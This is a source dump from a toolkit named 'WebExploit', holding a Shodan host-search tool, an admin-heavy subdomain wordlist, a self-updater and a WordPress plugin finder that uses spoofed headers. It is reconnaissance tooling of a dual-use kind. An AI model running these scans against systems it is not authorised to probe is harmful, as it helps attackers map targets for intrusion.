52 | l_white = "\033[1;37m"
53 | faint = "\033[2m"
54 | italic = "\033[3m"
55 | underline = "\033[4m"
56 | blink = "\033[5m"
57 | nefative = "\033[7m"
58 | cross = "\033[9m"
59 | ended = "\033[0m"
60 | bold = "\033[1m"
61 | nbold = "\033[0m"
62 | white = f.WHITE
63 |
64 | bnr = ['''
65 | ██████ ██████ ▓█████
66 | ▒██ ▒ ▒██ ▒ ▓█ ▀
67 | ░ ▓██▄ ░ ▓██▄ ▒███
68 | ▒ ██▒ ▒ ██▒ ▒▓█ ▄
69 | ▒██████▒▒ ▒██████▒▒ ░▒████
70 | ▒ ▒▓▒ ▒ ░ ▒ ▒▓▒ ▒ ░ ░░ ▒░
71 | ░ ░▒ ░ ░ ░▒ ░ ░ ░
72 | ░ ░ ░ ░ ░ ░ ░
73 | ░ ░ ░ ''', '''
74 | ░▒█▀▀▀█░░░▒█▀▀▀█░░░▒█▀▀▀
75 | ░░▀▀▀▄▄░░░░▀▀▀▄▄░░░▒█▀▀▀
76 | ░▒█▄▄▄█░░░▒█▄▄▄█░░░▒█▄▄▄ ''']
77 |
78 | def r_bnr(bnr):
79 | return choice(bnr)
80 |
81 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
82 | t.sleep(2)
83 | print(f' {italic}From{ended} : ', end='')
84 | #create flush text [simple]
85 | print(f'{red}{bold}', end='', flush=True)
86 | print(f'{bold}W', end='', flush=True)
87 | t.sleep(0.5)
88 | print('e', end='', flush=True)
89 | t.sleep(0.7)
90 | print('b', end='', flush=True)
91 | t.sleep(0.4)
92 | print('E', end='', flush=True)
93 | t.sleep(0.1)
94 | print('x', end='', flush=True)
95 | t.sleep(0.2)
96 | print('p', end='', flush=True)
97 | t.sleep(0.3)
98 | print('l', end='', flush=True)
99 | t.sleep(0.4)
100 | print('o', end='', flush=True)
101 | t.sleep(0.5)
102 | print('i', end='', flush=True)
103 | t.sleep(1.5)
104 | print(f't{ended}', flush=True)
105 | nbold = "\033[0m" # tahe koskholi !
106 | t.sleep(1)
107 | print(f'{white}{nbold}')
108 |
109 | print (f'\n {bold}{f.GREEN}[{f.WHITE}SSE{f.GREEN}]{f.WHITE}{f.RED} S.S.E{f.WHITE}{bold} S{nbold}odan {bold}S{nbold}earch {bold}E{nbold}ngine T00L !\n\n\n')
110 | t.sleep(3)
111 |
112 | save_question = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}SAVER{nbold}{f.WHITE} Save You\'r Logs To a .txt File? {bold}\'LOG_FILE\'{nbold} [ex: Y/y | N/n]:#{f.GREEN}{bold} ').lower()
113 |
114 | log = ('')
115 | data = ('')
116 |
117 | def saver(data):
118 | file = open((log) + ".txt", "a")
119 | file.write(data)
120 | file.close()
121 |
122 | if save_question.startswith("y"):
123 | log = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}SAVER{nbold}{f.WHITE} Give The Log\'s File Name ! {bold}\'LOG_FILE_NAME\'{nbold} [ex: MyLogs]:#{f.GREEN}{bold} ')
124 | #log = (log + '.txt')
125 | #print(pt)
126 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}Log\'s File Name{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{log}{nbold}')
127 |
128 | else:
129 | print (f'\n {f.YELLOW}{bold}WARNING{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}SAVER{nbold}{f.GREEN}{bold} SAVING \'SKIPPED\'{f.WHITE} ')
130 |
131 | t.sleep(2)
132 | print(f'{nbold}')
133 | while True:
134 | try:
135 | api_key = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}SAVER{nbold}{f.WHITE} GIVE ME A {bold}\'SHODAN_API_KEY\'{nbold} [ex: J2IdjIAjdiWiJVn...]:#{f.GREEN}{bold} ') #.rstrip("\n")
136 | if api_key:
137 | break
138 | else:
139 | continue
140 |
141 | except KeyboardInterrupt:
142 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
143 | t.sleep(2)
144 | sys.exit(0)
145 |
146 |
147 | t.sleep(3)
148 | print(f'{nbold}')
149 | print (f'\n {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}API KEY{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{api_key}{nbold}\n')
150 | t.sleep(0.5)
151 | api = shodan.Shodan(api_key)
152 | limit_num = 888
153 | count_num = 1
154 |
155 | try:
156 |
157 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}VERIFY [Shodan.io] API KEY{nbold}{f.WHITE}]{f.WHITE}{bold} CHECKING . . .{nbold}\n')
158 | api.search("WebExploit")
159 | t.sleep(1)
160 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}API KEY \'Authentication\' {nbold}{f.WHITE}] >>> {f.GREEN}{bold} SUCCESS . . .{nbold}\n')
161 |
162 | searcher = input(f'\n {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}S.S.E/{bold}SAVER{nbold}{f.WHITE} Enter You\'r {bold}\'KEYWORD[s]\'{nbold} [ex: port:80 http.title:"HACKED"]:#{f.GREEN}{bold} ')
163 |
164 | count_num = count_num + 1
165 |
166 | for result in api.search_cursor(searcher):
167 | ip = (result["ip_str"])
168 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}IP{nbold}{f.WHITE} >>> {bold}{green}{bold}{ip}{nbold}\n')
169 | t.sleep(0.1)
170 | port = (result["port"])
171 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}PORT{nbold}{f.WHITE} >>> {bold}{green}{bold}{port}{nbold}\n')
172 | t.sleep(0.1)
173 | org = (result["org"])
174 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}ORGANIZATION{nbold}{f.WHITE} >>> {bold}{green}{bold}{org}{nbold}\n')
175 | t.sleep(0.1)
176 | loc = (result["location"])
177 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}LOCATION{nbold}{f.WHITE} >>> {bold}{green}{bold}{loc}{nbold}\n')
178 | t.sleep(0.1)
179 | tra = (result["transport"])
180 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}LAYER{nbold}{f.WHITE} >>> {bold}{green}{bold}{tra}{nbold}\n')
181 | t.sleep(0.1)
182 | dom = (result["domains"])
183 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}DOMAIN\'S{nbold}{f.WHITE} >>> {bold}{green}{bold}{dom}{nbold}\n')
184 | t.sleep(0.1)
185 | hosts = (result["hostnames"])
186 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}HOST-NAME\'S{nbold}{f.WHITE} >>> {bold}{green}{bold}{hosts}{nbold}\n')
187 | t.sleep(0.1)
188 | d = (result["data"])
189 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}INFORMATION-SERVICE{nbold}{f.WHITE} >>> {bold}{green}{bold}{d}{nbold}\n')
190 | t.sleep(0.5)
191 | print (f' {f.WHITE}[{bold}{f.RED}WebExploit{nbold}{f.WHITE}] {white}{bold}SEARCH QUERY{nbold}{f.WHITE} >>> {bold}{green}{bold}{(str(count_num))}{nbold}\n')
192 | t.sleep(0.5)
193 | data = ("\t\n\nIP: " + str(result["ip_str"]) + ("\nPORT: " + str(result["port"])) + ("\nORGANIZATION: " + str(result["org"])) + ("\nLOCATION: " + str(result["location"])) + ("\nLAYER: " + str(result["transport"])) + ("\nDOMAINS: " + str(result["domains"])) + ("\nHOSTNAMES: " + str(result["hostnames"])) + ("\nDATA\n" + result["data"]))
194 |
195 | saver(data)
196 |
197 | t.sleep(0.3)
198 | count_num += 1
199 | if count_num >= limit_num:
200 | #os.system(f('mv {log} {pt}'))
201 | exit()
202 | except KeyboardInterrupt:
203 |
204 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
205 | t.sleep(2)
206 | sys.exit(0)
207 |
208 | except shodan.APIError as shodan_key_error:
209 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}S.S.E/{bold} !!! \'ERROR\' !!!{nbold}{f.WHITE}] >>> {f.GREEN}{bold} {shodan_key_error} {nbold}\n')
210 | print(f'\n\n {nbold}{f.WHITE}{f.RED}{bold}EXITTING . . .')
211 | t.sleep(3)
212 | sys.exit(0)
213 |
214 |
215 |
216 |
217 |
218 |
219 |
220 |
221 |
222 |
223 |
224 |
225 |
--------------------------------------------------------------------------------
/cores/subdomains.txt:
--------------------------------------------------------------------------------
1 | admin
2 | login
3 | log-in
4 | logini
5 | login1
6 | admin1
7 | administer
8 | administrator
9 | administratoraccounts
10 | account
11 | access
12 | adminlogin
13 | cp
14 | cpanel
15 | admin2
16 | ad3
17 | add
18 | administratoraccount
19 | admin
20 | log
21 | control
22 | control-admin
23 | control-panel
24 | paneladmin
25 | user
26 | users
27 | username
28 | tt
29 | ladmin
30 | loginadmin
31 | loginuser
32 | usr
33 | main
34 | administrators
35 | xadmin
36 | 1
37 | m
38 | cg
39 | cntrl
40 | ctrl
41 | accounts
42 | adminlogin
43 | userlogin
44 | ac
45 | acc
46 | pnl
47 | a
48 | acceptatie
49 | access
50 | accounting
51 | accounts
52 | ad
53 | adm
54 | admin
55 | administrator
56 | ads
57 | adserver
58 | affiliate
59 | affiliates
60 | agenda
61 | alpha
62 | alumni
63 | analytics
64 | ann
65 | api
66 | area
67 | apollo
68 | app
69 | apps
70 | ar
71 | archive
72 | art
73 | assets
74 | atlas
75 | auth
76 | auto
77 | autoconfig
78 | autodiscover
79 | av
80 | ayuda
81 | b
82 | b2b
83 | backup
84 | backups
85 | banner
86 | barracuda
87 | bb
88 | bbs
89 | beta
90 | biblioteca
91 | billing
92 | blackboard
93 | blog
94 | blogs
95 | board
96 | book
97 | booking
98 | bookings
99 | broadcast-ip
100 | bsd
101 | bt
102 | bug
103 | bugs
104 | business
105 | c
106 | ca
107 | cache
108 | cacti
109 | cal
110 | calendar
111 | cam
112 | careers
113 | cart
114 | cas
115 | catalog
116 | catalogo
117 | catalogue
118 | cc
119 | cctv
120 | cdn
121 | cdn1
122 | cdn2
123 | chat
124 | chimera
125 | chronos
126 | ci
127 | cisco
128 | citrix
129 | classroom
130 | client
131 | clientes
132 | clients
133 | cloud
134 | cloudflare-resolve-to
135 | club
136 | cms
137 | cn
138 | co
139 | community
140 | conference
141 | config
142 | connect
143 | contact
144 | contacts
145 | content
146 | control
147 | controller
148 | controlp
149 | controlpanel
150 | corp
151 | corporate
152 | correo
153 | correoweb
154 | cp
155 | cpanel
156 | crm
157 | cs
158 | css
159 | customers
160 | cvs
161 | d
162 | da
163 | loads
164 | data
165 | down
166 | download
167 | downloads
168 | downlod
169 | lod
170 | loading
171 | load
172 | database
173 | db
174 | db1
175 | db2
176 | dbadmin
177 | dbs
178 | dc
179 | de
180 | default
181 | demo
182 | demo2
183 | demon
184 | demostration
185 | descargas
186 | design
187 | desktop
188 | dev
189 | dev01
190 | dev1
191 | dev2
192 | devel
193 | developers
194 | development
195 | dialin
196 | diana
197 | direct
198 | directory
199 | dl
200 | dmz
201 | dns
202 | dns1
203 | dns2
204 | dns3
205 | dns4
206 | doc
207 | docs
208 | domain
209 | domain-controller
210 | domainadmin
211 | domaincontrol
212 | domaincontroller
213 | domaincontrolpanel
214 | domainmanagement
215 | domains
216 | drupal
217 | e
218 | eaccess
219 | echo
220 | ecommerce
221 | edu
222 | ektron
223 | elearning
224 | en
225 | eng
226 | enterpriseenrollment
227 | enterpriseregistration
228 | erp
229 | es
230 | event
231 | events
232 | ex
233 | example
234 | examples
235 | exchange
236 | external
237 | extranet
238 | f
239 | facebook
240 | faq
241 | fax
242 | fb
243 | feedback
244 | feeds
245 | file
246 | files
247 | fileserver
248 | finance
249 | firewall
250 | folders
251 | forms
252 | foro
253 | foros
254 | forum
255 | forums
256 | foto
257 | fr
258 | free
259 | freebsd
260 | fs
261 | ftp
262 | ftp1
263 | ftp2
264 | ftpadmin
265 | ftpd
266 | fw
267 | g
268 | galeria
269 | gallery
270 | game
271 | games
272 | gate
273 | gateway
274 | gilford
275 | gis
276 | git
277 | gmail
278 | go
279 | google
280 | groups
281 | groupwise
282 | gu
283 | guest
284 | guia
285 | guide
286 | gw
287 | health
288 | help
289 | helpdesk
290 | hera
291 | heracles
292 | hercules
293 | hermes
294 | home
295 | homer
296 | host
297 | host2
298 | hosting
299 | hotspot
300 | hr
301 | hypernova
302 | i
303 | id
304 | idp
305 | im
306 | image
307 | images
308 | images1
309 | images2
310 | images3
311 | images4
312 | images5
313 | images6
314 | images7
315 | images8
316 | imail
317 | imap
318 | imap3
319 | imap3d
320 | imapd
321 | imaps
322 | img
323 | img1
324 | img2
325 | img3
326 | imgs
327 | imogen
328 | in
329 | incoming
330 | info
331 | inmuebles
332 | internal
333 | interno
334 | intra
335 | intranet
336 | io
337 | ip
338 | ip6
339 | ipfixe
340 | iphone
341 | ipmi
342 | ipsec
343 | ipv4
344 | ipv6
345 | irc
346 | ircd
347 | is
348 | isa
349 | it
350 | j
351 | ja
352 | jabber
353 | jboss
354 | jboss2
355 | jira
356 | job
357 | jobs
358 | jp
359 | js
360 | jupiter
361 | k
362 | kb
363 | kerberos
364 | l
365 | la
366 | lab
367 | laboratories
368 | laboratorio
369 | laboratory
370 | labs
371 | ldap
372 | legacy
373 | lib
374 | library
375 | link
376 | links
377 | linux
378 | lisa
379 | list
380 | lists
381 | live
382 | lms
383 | local
384 | localhost
385 | log
386 | loghost
387 | login
388 | logon
389 | logs
390 | london
391 | loopback
392 | love
393 | lp
394 | lync
395 | lyncdiscover
396 | m
397 | m1
398 | m2
399 | magento
400 | mail
401 | mail01
402 | mail1
403 | mail2
404 | mail3
405 | mail4
406 | mail5
407 | mailadmin
408 | mailbackup
409 | mailbox
410 | mailer
411 | mailgate
412 | mailhost
413 | mailing
414 | mailman
415 | mailserver
416 | main
417 | manage
418 | manager
419 | mantis
420 | map
421 | maps
422 | market
423 | marketing
424 | mars
425 | master
426 | math
427 | mb
428 | mc
429 | mx1
430 | mx2
431 | mx3
432 | mx4
433 | mx5
434 | mx6
435 | mx7
436 | mx8
437 | mx9
438 | mx10
439 | mdm
440 | media
441 | meet
442 | member
443 | members
444 | mercury
445 | meta
446 | meta01
447 | meta02
448 | meta03
449 | meta1
450 | meta2
451 | meta3
452 | miembros
453 | mijn
454 | minerva
455 | mirror
456 | ml
457 | mm
458 | mob
459 | mobil
460 | mobile
461 | monitor
462 | monitoring
463 | moodle
464 | movil
465 | mrtg
466 | ms
467 | msoid
468 | mssql
469 | munin
470 | music
471 | mx
472 | mx-a
473 | mx-b
474 | mx0
475 | mx01
476 | mx02
477 | mx03
478 | mx1
479 | mx2
480 | mx3
481 | my
482 | mysql
483 | mysql2
484 | n
485 | nagios
486 | nas
487 | nat
488 | nelson
489 | neon
490 | net
491 | netmail
492 | netscaler
493 | network
494 | network-ip
495 | networks
496 | new
497 | newmail
498 | news
499 | newsgroups
500 | newsite
501 | newsletter
502 | nl
503 | noc
504 | novell
505 | ns
506 | ns0
507 | ns01
508 | ns02
509 | ns03
510 | ns1
511 | ns10
512 | ns11
513 | ns12
514 | ns2
515 | ns3
516 | ns4
517 | ns5
518 | ns6
519 | ns7
520 | ns8
521 | nt
522 | ntp
523 | ntp1
524 | o
525 | oa
526 | office
527 | office2
528 | old
529 | oldmail
530 | oldsite
531 | oldwww
532 | on
533 | online
534 | op
535 | openbsd
536 | operation
537 | operations
538 | ops
539 | ora
540 | oracle
541 | origin
542 | orion
543 | os
544 | osx
545 | ou
546 | outgoing
547 | outlook
548 | owa
549 | ox
550 | p
551 | painel
552 | panel
553 | partner
554 | partners
555 | pay
556 | payment
557 | payments
558 | pbx
559 | pcanywhere
560 | pda
561 | pegasus
562 | pendrell
563 | personal
564 | pgsql
565 | phoenix
566 | photo
567 | photos
568 | php
569 | phpmyadmin
570 | pm
571 | pma
572 | poczta
573 | pop
574 | pop3
575 | portal
576 | portfolio
577 | post
578 | postgres
579 | postgresql
580 | postman
581 | postmaster
582 | pp
583 | ppp
584 | pr
585 | pre-prod
586 | pre-production
587 | preprod
588 | press
589 | preview
590 | private
591 | pro
592 | prod
593 | priv8
594 | production
595 | project
596 | projects
597 | promo
598 | proxy
599 | prueba
600 | pruebas
601 | pt
602 | pub
603 | public
604 | q
605 | qa
606 | r
607 | ra
608 | radio
609 | radius
610 | ras
611 | rdp
612 | redirect
613 | redmine
614 | register
615 | relay
616 | remote
617 | remote2
618 | repo
619 | report
620 | reports
621 | repos
622 | research
623 | resources
624 | restricted
625 | reviews
626 | robinhood
627 | root
628 | router
629 | rss
630 | rt
631 | rtmp
632 | ru
633 | s
634 | s1
635 | s2
636 | s3
637 | s4
638 | sa
639 | sales
640 | sample
641 | samples
642 | sandbox
643 | sc
644 | search
645 | secure
646 | security
647 | seo
648 | server
649 | server1
650 | server2
651 | service
652 | services
653 | sftp
654 | share
655 | sharepoint
656 | shell
657 | shop
658 | shopping
659 | signup
660 | sip
661 | site
662 | siteadmin
663 | sitebuilder
664 | sites
665 | skype
666 | sms
667 | smtp
668 | smtp1
669 | smtp2
670 | smtp3
671 | snmp
672 | social
673 | software
674 | solaris
675 | soporte
676 | sp
677 | spam
678 | speedtest
679 | sport
680 | sports
681 | sql
682 | sqlserver
683 | squirrel
684 | squirrelmail
685 | ssh
686 | ssl
687 | sslvpn
688 | sso
689 | st
690 | staff
691 | stage
692 | staging
693 | start
694 | stat
695 | static
696 | static1
697 | static2
698 | stats
699 | status
700 | storage
701 | store
702 | stream
703 | streaming
704 | student
705 | sun
706 | support
707 | survey
708 | sv
709 | svn
710 | t
711 | team
712 | tech
713 | telewerk
714 | telework
715 | temp
716 | test
717 | test1
718 | test2
719 | test3
720 | testing
721 | testsite
722 | testweb
723 | tfs
724 | tftp
725 | thumbs
726 | ticket
727 | tickets
728 | time
729 | tools
730 | trac
731 | track
732 | tracker
733 | tracking
734 | train
735 | training
736 | travel
737 | ts
738 | tunnel
739 | tutorials
740 | tv
741 | tw
742 | u
743 | uat
744 | uk
745 | unix
746 | up
747 | update
748 | upload
749 | uploads
750 | us
751 | user
752 | users
753 | v
754 | v2
755 | vb
756 | vc
757 | ventas
758 | video
759 | videos
760 | vip
761 | virtual
762 | vista
763 | vle
764 | vm
765 | vms
766 | vmware
767 | vnc
768 | vod
769 | voip
770 | vpn
771 | vpn1
772 | vpn2
773 | vpn3
774 | vps
775 | vps1
776 | vps2
777 | w
778 | w3
779 | wap
780 | wc
781 | web
782 | web0
783 | web01
784 | web02
785 | web03
786 | web1
787 | web2
788 | web3
789 | web4
790 | web5
791 | webadmin
792 | webcam
793 | webconf
794 | webct
795 | webdb
796 | webdisk
797 | weblog
798 | webmail
799 | webmail2
800 | webmaster
801 | webmin
802 | webservices
803 | webstats
804 | webstore
805 | whm
806 | wifi
807 | wiki
808 | win
809 | win32
810 | windows
811 | wordpress
812 | work
813 | wp
814 | ws
815 | wsus
816 | ww
817 | ww0
818 | ww01
819 | ww02
820 | ww03
821 | ww1
822 | ww2
823 | ww3
824 | www
825 | www-test
826 | www0
827 | www01
828 | www02
829 | www03
830 | webexploit
831 | www1
832 | www2
833 | www3
834 | www4
835 | www5
836 | www6
837 | www7
838 | wwwm
839 | wwwold
840 | wwww
841 | x
842 | xml
843 | zabbix
844 | zeus
845 | zimbra
846 |
--------------------------------------------------------------------------------
/cores/updater.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/python3
2 | from requests import get
3 | from subprocess import Popen
4 |
5 | def run():
6 |
7 | ver:str=open('VERSION', 'r').read().split()[0]
8 |
9 | githubVerionController:str=get('https://raw.githubusercontent.com/C4ssif3r/WebExploit/main/VERSION').text.split()[0]
10 |
11 | if ver != githubVerionController:
12 | updateQuestion:str=input (f'update available !\n web explloit new verion: {githubVerionController}\nare you want to update ? [y/n] ').lower()
13 | if updateQuestion=='y':
14 | Popen('cd .. && rm -rf WebExploit && git clone --depth=1 https://github.com/C4ssif3r/WebExploit', shell=True)
15 | print ('[WebExploit] UPDATED , PLZ CLOSE TERMINAL AND USE AGAIN =)')
16 | else: print ("[WebExploit] UPDATE SKIPPED .")
17 | else:
18 | print ("[WebExploit] YOU ARE USING LASTED VERSION")
19 | return
20 |
21 |
22 |
--------------------------------------------------------------------------------
/cores/wpf.py:
--------------------------------------------------------------------------------
1 | def run():
2 | '''
3 | MIT License
4 |
5 | Copyright (c) 2022 MJi | DarkƤwn [github.com/c4ssif3r]
6 |
7 | Permission is hereby granted, free of charge, to any person obtaining a copy
8 | of this software and associated documentation files (the "Software"), to deal
9 | in the Software without restriction, including without limitation the rights
10 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
11 | copies of the Software, and to permit persons to whom the Software is
12 | furnished to do so, subject to the following conditions:
13 |
14 | The above copyright notice and this permission notice shall be included in all
15 | copies or substantial portions of the Software.
16 |
17 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
18 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
19 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
20 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
21 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
22 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
23 | SOFTWARE.
24 | '''
25 | try:
26 | import time as t
27 | from colorama import Fore as f
28 | import sys, os
29 | import requests as r
30 | from random import choice
31 | from fake_headers import Headers
32 | except:
33 | print("\033[0;31m please run command \033[0;32m pip install -r requirements.txt !")
34 | t.sleep(1)
35 | sys.exit()
36 |
37 | black = "\033[0;30m"
38 | red = "\033[0;31m"
39 | green = "\033[0;32m"
40 | brown = "\033[0;33m"
41 | blue = "\033[0;34m"
42 | purple = "\033[0;35m"
43 | cyan = "\033[0;36m"
44 | l_gray = "\033[0;37m"
45 | dark_gray = "\033[1;30m"
46 | l_red = "\033[1;31m"
47 | l_green = "\033[1;32m"
48 | yellow = "\033[1;33m"
49 | l_blue = "\033[1;34m"
50 | l_purple = "\033[1;35m"
51 | l_cyan = "\033[1;36m"
52 | l_white = "\033[1;37m"
53 | faint = "\033[2m"
54 | italic = "\033[3m"
55 | underline = "\033[4m"
56 | blink = "\033[5m"
57 | nefative = "\033[7m"
58 | cross = "\033[9m"
59 | ended = "\033[0m"
60 | bold = "\033[1m"
61 | nbold = "\033[0m"
62 | white = f.WHITE
63 |
64 | bnr = ['''
65 | ░█░░▒█░░▒█▀▄░░▒█▀
66 | ░▀▄▀▄▀▒░░█▀▒▒░░█▀ ''', '''
67 | █ █░ ██▓███ █████
68 | ▓█░ █ ░█░ ▓██░ ██ ▓██
69 | ▒█░ █ ░█ ▓██░ ██▓▒ ▒████
70 | ░█░ █ ░█ ▒██▄█▓▒ ▒ ░▓█▒
71 | ░░██▒██▓ ▒██▒ ░ ░ ▒░▒█░
72 | ░ ▓░▒ ▒ ▒▓▒░ ░ ░ ░ ▒ ░
73 | ▒ ░ ░ ░▒ ░ ░ ░
74 | ░ ░ ░░ ░ ░
75 | ░ ░ ''']
76 |
77 | def r_bnr(bnr):
78 | return choice(bnr)
79 |
80 | print (f'{blink}{r_bnr(bnr)}{ended}', end='')
81 | t.sleep(2)
82 | print(f' {italic}From{ended} : ', end='')
83 | #create flush text [simple]
84 | print(f'{red}{bold}', end='', flush=True)
85 | print(f'{bold}W', end='', flush=True)
86 | t.sleep(0.5)
87 | print('e', end='', flush=True)
88 | t.sleep(0.7)
89 | print('b', end='', flush=True)
90 | t.sleep(0.4)
91 | print('E', end='', flush=True)
92 | t.sleep(0.1)
93 | print('x', end='', flush=True)
94 | t.sleep(0.2)
95 | print('p', end='', flush=True)
96 | t.sleep(0.3)
97 | print('l', end='', flush=True)
98 | t.sleep(0.4)
99 | print('o', end='', flush=True)
100 | t.sleep(0.5)
101 | print('i', end='', flush=True)
102 | t.sleep(1.5)
103 | print(f't{ended}', flush=True)
104 | nbold = "\033[0m" # tahe koskholi !
105 | t.sleep(1)
106 | print(f'{white}{nbold}')
107 |
108 | print (f'\n {bold}{f.GREEN}[{f.WHITE}WPF{f.GREEN}]{f.WHITE}{f.RED} W.P.F{f.WHITE}{bold} W{nbold}ordpress {bold}P{nbold}lugin {bold}F{nbold}inder T00L !\n\n\n')
109 | t.sleep(3)
110 |
111 |
112 | while True:
113 | try:
114 | url = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}W.P.F/{bold}WP-URL{nbold}{f.WHITE} enter \'WordPress-{bold}URL{nbold}\' [ex: wordpress.com]:#{f.GREEN}{bold} ')
115 | print(f'{nbold}')
116 |
117 | if url:
118 | if 'http' in url or 'https' in url:
119 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.CYAN}Skipper{f.WHITE}] SKIPPING ADD {bold}{f.GREEN} HTTP://{nbold} to [{green}{bold}{url}{nbold}]\n')
120 | t.sleep(2)
121 | break
122 | if 'http' not in url or 'https' not in url:
123 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.CYAN}Adder{white}] AUTOMATICALLY ADDING {bold}{f.GREEN} HTTP://{nbold} to [{green}{bold}{url}{nbold}]\n')
124 | url = (f'http://{url}')
125 | t.sleep(2)
126 | break
127 | else:
128 | continue
129 | except KeyboardInterrupt:
130 | print(f'\n\n {nbold}{f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}] TERMINATED BY {bold}USER{nbold} EXITTING . . .')
131 | t.sleep(2)
132 | # break
133 | sys.exit(0)
134 |
135 | print (f' {f.WHITE}[{f.GREEN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}WPF/{bold}URL{nbold}{f.WHITE}]{f.WHITE} >>> {bold}{url}{nbold}\n')
136 | t.sleep(2)
137 | print (f' {f.WHITE}[{f.GREEN}{bold}INFO{f.WHITE}{nbold}@{f.RED}W.P.F/{f.GREEN}CHECK-URL{white}] {nbold}{f.CYAN} FOR VERIFY SITE IS \'{bold}WORDPRESS{nbold}\'] . . .{nbold} \n')
138 | t.sleep(2)
139 | if url[-1:] == '/':
140 | pass
141 | else:
142 | url = (f'{url}/')
143 |
144 | try:
145 | headers1 = Headers(
146 | browser="firefox",
147 | os="lin",
148 | headers=True).generate()
149 | checker = r.get(url+"/wp-content/plugins/", headers=headers1)
150 | checker.raise_for_status()
151 | except r.exceptions.RequestException as url_error:
152 |
153 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}W.P.F/{f.GREEN}REQUEST-MAKER{white}] {nbold}{f.CYAN} CAN\'T CONNECT TO \'{bold}{url}{nbold}\'{nbold} ERROR: {bold}{url_error}{nbold}\n')
154 | t.sleep(2)
155 | raise SystemExit(url_error)
156 | #sys.exit()
157 |
158 | if checker.status_code == 404 or checker.status_code == 500:
159 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}W.P.F/{f.GREEN}CHECK-URL] {nbold}{f.CYAN} URL IS NOT \'{bold}WORDPRESS{nbold}\'{nbold} CHECK THAT ... !\n')
160 | sys.exit()
161 | else:
162 | print (f' {f.WHITE}[{f.GREEN}{bold}SUCCESS{f.WHITE}{nbold}@{f.RED}W.P.F/{f.GREEN}Checker] {nbold}{f.CYAN} The {url} is \'{bold}WORDPRESS{nbold}\' \n')
163 |
164 | t.sleep(1)
165 | print (f'\n {f.WHITE}[{f.YELLOW}WARNING{f.WHITE}] if you dont have plugin file press ENTER for using {bold}default plugins{nbold} ! sleeping ', end='', flush=True)
166 | t.sleep(1)
167 | print ('5 ', end='', flush=True)
168 | t.sleep(1)
169 | print ('4 ', end='', flush=True)
170 | t.sleep(1)
171 | print ('3 ', end='', flush=True)
172 | t.sleep(1)
173 | print ('2 ', end='', flush=True)
174 | t.sleep(1)
175 | print ('1 ', flush=True)
176 | t.sleep(1)
177 | print('')
178 | plugins = []
179 |
180 | files = input(f' {f.WHITE}[{f.CYAN}{bold}WebExploit{f.WHITE}{nbold}@{f.RED}W.P.F/{bold}WP-PLUGIN{nbold}{f.WHITE} enter \'WordPress-{bold}PLUGIN[FILE.TXT]{nbold}\' [ex: wp-plugins.txt]:#{f.GREEN}{bold} ')
181 | print('')
182 | try:
183 | plugins = open(files, 'r').read().split()
184 |
185 | except Exception as file_err:
186 | print (f' {f.WHITE}[{f.RED}{bold}ERROR{f.WHITE}{nbold}@{f.RED}W.P.F/{f.GREEN}Plugins{white}] {nbold}{f.CYAN} ERROR : \'{bold}{file_err}{nbold}\' \n')
187 | t.sleep(1)
188 |
